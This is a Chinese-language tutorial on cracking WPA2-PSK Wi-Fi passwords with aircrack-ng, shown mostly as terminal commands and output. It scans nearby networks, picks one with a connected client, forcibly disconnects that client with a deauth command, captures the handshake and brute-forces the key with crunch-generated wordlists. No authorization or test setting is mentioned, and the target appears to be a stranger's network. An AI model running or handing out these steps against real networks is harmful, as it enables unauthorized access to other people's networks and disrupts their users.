写于:2014-09-14 最近一次更新:2016-06-18
Intent:
破解WPA2-PSK加密的无线网络
Oneway:
如今的无线路由器都默认使用WPA2-PSK加密无线信号,
到目前为止,尚无关于短时间内破解WPA2-PSK密码的方法,
只能采用先捕获 WPA handshake 然后再暴力破解的方式
(由于WPS功能的出现,曾经可以通过类似reaver的软件在较短时间内破解pin码,
从而获得WPA2-PSK的密码,但现在的路由器已经修补了这个漏洞,
reaver破解变得比暴力破解都费时费力)
Details:
将无线网卡设置为监听模式(即混杂模式),以便于捕获WPA handshake
root@diagmap:~# airmon-ng start wlan0
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
811 NetworkManager
1128 wpa_supplicant
1144 dhcpcd
Process with PID 1144 (dhcpcd) is running on interface wlan0
Interface Chipset Driver
wlan0 Atheros AR9285 ath9k - [phy0]
(monitor mode enabled on mon0)
出现提示monitor mode enabled on mon0表示成功设置网卡为监听模式
查看待破解目标
root@diagmap:~# airodump-ng -a mon0
CH -1 ][ Elapsed: 1 min ][ 2014-09-24 13:41 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
82:17:7B:9C:B8:F5 -47 505 0 0 11 54e WPA2 CCMP MGT love
CC:34:29:39:22:30 -55 752 3084 37 11 54e. WPA2 CCMP PSK WGW
9C:B7:0D:E7:ED:8D -66 271 0 0 10 54e. WPA2 CCMP PSK dsq
F4:EC:38:64:69:5E -54 1 0 0 1 54e. WPA2 CCMP PSK mnxnm
BSSID STATION PWR Rate Lost Frames Probe
00:17:7B:9C:BD:27 E0:91:53:85:D2:C0 -87 0 - 1 0 87
F4:EC:38:64:69:5E F8:A4:5F:70:5F:2A -76 0 - 1 0 4
选定目标
PWR项的值一般在-50~-90之间,-50的信号比-90强
ESSID为mnxnm的无线网络当前有客户端F8:A4:5F:70:5F:2A连接
选定mnxnm为破解目标
下面针对mnxnm进行数据包捕获
root@diagmap:~# airodump-ng --bssid F4:EC:38:64:69:5E --write /home/sman/Desktop/zhuaBao --ivs mon0
CH -1 ][ Elapsed: 12 s ][ 2014-09-24 13:58 ]
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
BSSID STATION PWR Rate Lost Frames Probe
等待......
CH -1 ][ Elapsed: 1 min ][ 2014-09-24 14:03
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F4:EC:38:64:69:5E -39 1 0 0 1 54e. WPA2 CCMP PSK mnxnm
BSSID STATION PWR Rate Lost Frames Probe
捕捉到有连接mnxnm的客户端
CH -1 ][ Elapsed: 6 mins ][ 2014-09-24 14:08
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F4:EC:38:64:69:5E -42 3 0 0 1 54e. WPA2 CCMP PSK mnxnm
BSSID STATION PWR Rate Lost Frames Probe
F4:EC:38:64:69:5E F8:A4:5F:70:5F:2A -39 0 - 1 0 1
如果长时间捕获不到WPA handshake,则再开启一个命令终端,
使用以下命令强制断开当前用户与路由器的连接,以便更快捕获WPA handshake
注意,这条命令执行一两次就好,不要频繁执行,否则会导致路由器重启
root@diagmap:~# aireplay-ng -a F4:EC:38:64:69:5E -c F8:A4:5F:70:5F:2A --deauth 1 --ignore-negative-one mon0
捕获到WPA handshake
CH -1 ][ Elapsed: 6 mins ][ 2014-09-24 14:08 ][ WPA handshake: F4:EC:38:64:69:5E ]
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F4:EC:38:64:69:5E -42 3 0 0 1 54e. WPA2 CCMP PSK mnxnm
BSSID STATION PWR Rate Lost Frames Probe
F4:EC:38:64:69:5E F8:A4:5F:70:5F:2A -39 0 - 1 0 1
开始暴力破解
这个过程根据机器的配置是否强悍,需要几天甚至更多时间
使用现成的密码字典wordlist.txt,密码字典可以是自己从网上下载的,或者自己用工具生成的
aircrack-ng /home/sman/Desktop/zhuaBao-01.ivs -w /home/sman/Desktop/wordlist.txt
由于大部分字典都很大100G,1000G,甚至10T,或者更大,一般人的硬盘不够用
所以可以采用边生成字典边破解的方式,这里字典生成工具为crunch,具体命令为
crunch 8 8 abcdefghijklmnopqrstuvwxyz0123456789 |\
aircrack-ng -a 2 -b F4:EC:38:64:69:5E -w - /home/sman/Desktop/zhuaBao-01.ivs
如果中途需要中断破解,过后继续破解过程,可以使用crunch的-s参数
指定从中断的密码处继续下去,如从密码“a92x1h41”处继续生成字典用于破解
crunch 8 8 abcdefghijklmnopqrstuvwxyz0123456789 -s a92x1h41 |\
aircrack-ng -a 2 -b F4:EC:38:64:69:5E -w - /home/sman/Desktop/zhuaBao-01.ivs
一般人配置的wpa密码都是8位的,且为小写字母加数字的组合居多,暴力破解出来的概率是很大的
直到出现 KEY FOUND 字样时,表示破解成功
|